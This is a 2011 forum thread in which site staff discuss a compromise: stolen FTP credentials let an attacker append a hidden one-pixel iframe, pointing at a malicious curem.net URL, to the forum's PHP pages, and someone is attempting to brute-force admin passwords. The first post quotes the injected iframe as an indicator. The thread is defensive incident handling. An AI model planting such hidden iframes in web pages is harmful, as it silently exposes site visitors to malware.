Hacking attempt.

mods, admin, site ops and their bitches only

Hacking attempt.

Postby sbando on Wed Feb 23, 2011 8:32 pm

Someone injected the forum with a virus, Nop cleaned all the affected pages.

What gives it away is this malicious code

Code: Select all
<iframe heigth="1" width="1" frameborder="0" src=MailScanner has detected a possible fraud attempt from "curem.net" claiming to be "http://curem.net/t.php?id=1461961"></iframe>


at the end of php pages.

Nop quickly determined that someone or something stole my ftp password (you can read about the curem.net virus all over the Net).


ANYWAY, Bunny and me are pretty sure now that the same kid (or someone else) is also trying to bruteforce admin credentials, please change all your password to something long and complicated.
User avatar
sbando
Extinct
 
Posts: 9293
Joined: Tue Apr 10, 2007 8:25 pm
Location: Firenze, IT

Re: Hacking attempt.

Postby paroxysmia on Wed Feb 23, 2011 9:05 pm

User avatar
paroxysmia
EBI's Illuminatus
 
Posts: 12579
Joined: Fri Aug 31, 2007 3:57 pm
Location: http://192.168.1.1/

Re: Hacking attempt.

Postby paroxysmia on Wed Feb 23, 2011 9:20 pm

And did you check phpBB is up-to-date?
User avatar
paroxysmia
EBI's Illuminatus
 
Posts: 12579
Joined: Fri Aug 31, 2007 3:57 pm
Location: http://192.168.1.1/

Re: Hacking attempt.

Postby sbando on Wed Feb 23, 2011 10:13 pm

Nop will update the forum too.
It's not a security breach in the forum's software, though, someone is trying to guess our passwords.
In the first case, the virus stole my ftp credentials and then connected to they site.
User avatar
sbando
Extinct
 
Posts: 9293
Joined: Tue Apr 10, 2007 8:25 pm
Location: Firenze, IT

Re: Hacking attempt.

Postby paroxysmia on Wed Feb 23, 2011 10:29 pm

Do you know the duration of the forum infection?

And do you think (or another admin) some users might be infected silently? (trojans etc)
User avatar
paroxysmia
EBI's Illuminatus
 
Posts: 12579
Joined: Fri Aug 31, 2007 3:57 pm
Location: http://192.168.1.1/

Re: Hacking attempt.

Postby sbando on Wed Feb 23, 2011 10:54 pm

I dunno if the iframe injection in case can affect the actual users or other sites, but I suggest you change your forum pw and recreate any ftp account you might have stored in your ftp client.
User avatar
sbando
Extinct
 
Posts: 9293
Joined: Tue Apr 10, 2007 8:25 pm
Location: Firenze, IT

Re: Hacking attempt.

Postby paroxysmia on Wed Feb 23, 2011 11:00 pm

Pwd already changed. And I don't have any FTP account. Thx. :wink:
User avatar
paroxysmia
EBI's Illuminatus
 
Posts: 12579
Joined: Fri Aug 31, 2007 3:57 pm
Location: http://192.168.1.1/

Re: Hacking attempt.

Postby Mr_White on Sun Feb 27, 2011 1:06 am

wtf is an FTP account?

Sorry for asking, but I really dunno.
OTOH it seems that somebody is trying to guess passwords. After typing in my password I received an "You had too many fail login attempts" message. Which is funny, because it was my first login today. But that bullshit dude will have a hard time to guess my new and improved password....

:twisted: :evil:
User avatar
Mr_White
Respected member
 
Posts: 662
Joined: Thu Apr 19, 2007 7:44 pm


Return to The lions cage

Who is online

Users browsing this forum: No registered users and 0 guests